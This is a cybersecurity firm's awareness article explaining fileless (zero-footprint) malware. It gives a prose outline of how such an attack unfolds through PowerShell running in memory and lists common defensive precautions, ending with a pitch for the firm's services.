Select Page
Fileless Malware

Protecting Your System from Zero-Footprint Cyber-Attacks

Cybercriminals are continually on the lookout for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless, or macro attack. This type of attack does not install software on a computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten-times more likely to succeed than file-based attacks and they estimate that over 75% of successful compromising cyberattacks in 2017 were fileless.

Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user to click a suspicious link or open a malicious file; however, they don’t need to install detectable files on a computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily-discoverable artifacts behind.


Anatomy of a Zero-Footprint Attack

Here’s an example of how a zero-footprint attack works:

  1. A user clicks a link to a malicious website.
  2. The website loads Flash.
  3. Flash is used to open the Windows PowerShell utility.
  4. PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
  5. The PowerShell script locates the user’s critical data and sends it to the attacker.


Detecting Zero-Footprint Attacks

Fortunately, the zero-footprint moniker is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link, even when there is no executable file installed. However, zero-footprint malware is hidden in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for a longer period of time.


Combatting Zero-Footprint Attacks

Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:

  • Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version
  • Educate your users on the dangers of downloading email attachments or clicking on suspicious links
  • Restrict access to administrative tools like WMI, PowerShell, and Apple Script, that cybercriminals can leverage for attacks
  • Restrict the number of domain administrators who have full access to domain settings
  • Harden your firewalls, endpoint protection, email security, and web blockers
  • Employ behavioral-based network security that enforces rules based on user’s actions and does not rely on signature-based malware detection.


No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools, can slow down or derail cyberattackers and increase the probability they will make mistakes that expose their presence or reveal their attack vector.

Cerium can help

Chances are, zero-footprint attacks will continue to get smarter and become more common. Cerium offers a variety of services and technology to help organizations prevent a wide-range of cyberattacks, including zero-footprint attacks. Contact a Cerium cybersecurity expert to get the latest on cybersecurity trends, advice for protecting your network, tips for spotting security compromises, and guidelines for mitigating risks after a breach.

Talk with a cybersecurity expert

Related Articles

A sampling of other articles you may enjoy if you liked this one.

Cybersecurity Myth – DEBUNKED: My job is to simply keep the bad guys out
Jul 15, 2021

We have to accept that simply trying to keep the bad guys out is no longer good enough. In this epis...

Read More
Threat of the Month: IcedID Malware
Jul 14, 2021

About Threat of the Month Series With the rise of cyberattacks, it’s impossible for security and ...

Read More
Cybersecurity Myth – DEBUNKED: “We have an EA and it has all the security services we need”
Jul 6, 2021

Enterprise agreements can provide a lot of access and flexibility, however there is a lot to conside...

Read More
For Emergency Support call: (877) 423-7486
For other support requests or to access your Cerium 1463° portal click here
Stay in the Know

Stay in the Know

Don't miss out on critical security advisories, industry news, and technology insights from our experts. Sign up today!

You have Successfully Subscribed!